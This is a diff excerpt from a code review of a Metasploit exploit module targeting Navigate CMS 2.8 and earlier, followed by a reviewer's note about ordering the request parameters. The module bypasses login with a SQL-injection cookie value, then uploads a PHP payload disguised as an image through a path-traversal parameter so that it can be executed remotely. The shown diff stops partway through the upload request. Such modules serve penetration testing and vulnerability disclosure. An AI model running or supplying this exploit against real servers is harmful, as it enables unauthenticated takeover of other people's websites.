modules/exploits/multi/http/navigate_cms_rce.rb

```diff
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Navigate CMS Unauthenticated Remote Code Execution',
+      'Description' => %q(
+      This module exploits insufficient sanitization in the database::protect
+      method, of Navigate CMS versions 2.8 and prior, to bypass authentication.
+
+      It then uses a path traversal vulnerability in navigate_upload.php that
+      allows authenticated users to upload PHP files to arbitrary locations.
+      Together these vulnerabilities allow an unauthenticated attacker to
+      execute arbitrary PHP code remotely.
+
+      This module was tested against Navigate CMS 2.8.
+      ),
+      'Author' =>
+        [
+          'Pyriphlegethon' # Discovery / msf module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2018-17552'], # Authentication bypass
+          ['CVE', '2018-17553']  # File upload
+        ],
+      'Privileged' => false,
+      'Platform' => ['php'],
+      'Arch' => ARCH_PHP,
+      'Payload' => {},
+      'Targets' =>
+        [
+          ['Automatic', {}]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Sep 26 2018'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/'])
+      ]
+    )
+  end
+
+  def login_bypass
+    send_request_cgi(
+      'method' => 'POST',
+      'cookie' => 'navigate-user=\" OR TRUE--%20',
+      'uri' => normalize_uri(target_uri.path, '/login.php')
+    )
+  end
+
+  def check
+    check = login_bypass
+
+    if check &&
+       check.code == 302
+      return CheckCode::Vulnerable
+    end
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    init = login_bypass
+
+    fail_with(Failure::Unreachable, 'Unable to reach target') unless init
+
+    session_id = init.get_cookies_parsed
+                     .values.select { |v| v.to_s =~ /NVSID_/ }.first.first
+
+    if init.code == 302 && session_id
+      print_good('Login bypass successful')
+    else
+      fail_with(Failure::NoAccess, 'Login bypass failed')
+    end
+
+    php = %(<?php #{payload.encoded} ?>)
+    data = Rex::MIME::Message.new
+    data.add_part(php, 'image/jpeg', nil,
+      "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(10..15)}\"")
+    data_post = data.to_s
+
+    upload = send_request_cgi(
+      'method' => 'POST',
+      'cookie' => init.get_cookies,
+      'vars_get' => Hash[{
+        'session_id' => session_id,
+        'engine' => 'picnik',
+        'id' => '../../../navigate_info.php'
+      }.to_a.shuffle],
+      'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
```

Comment:
Not a big deal, but usually the URI is one of the first lines in the hash, which makes it easier to following what's happening when reading the code. Putting the URI before the GET params would make sense for readability.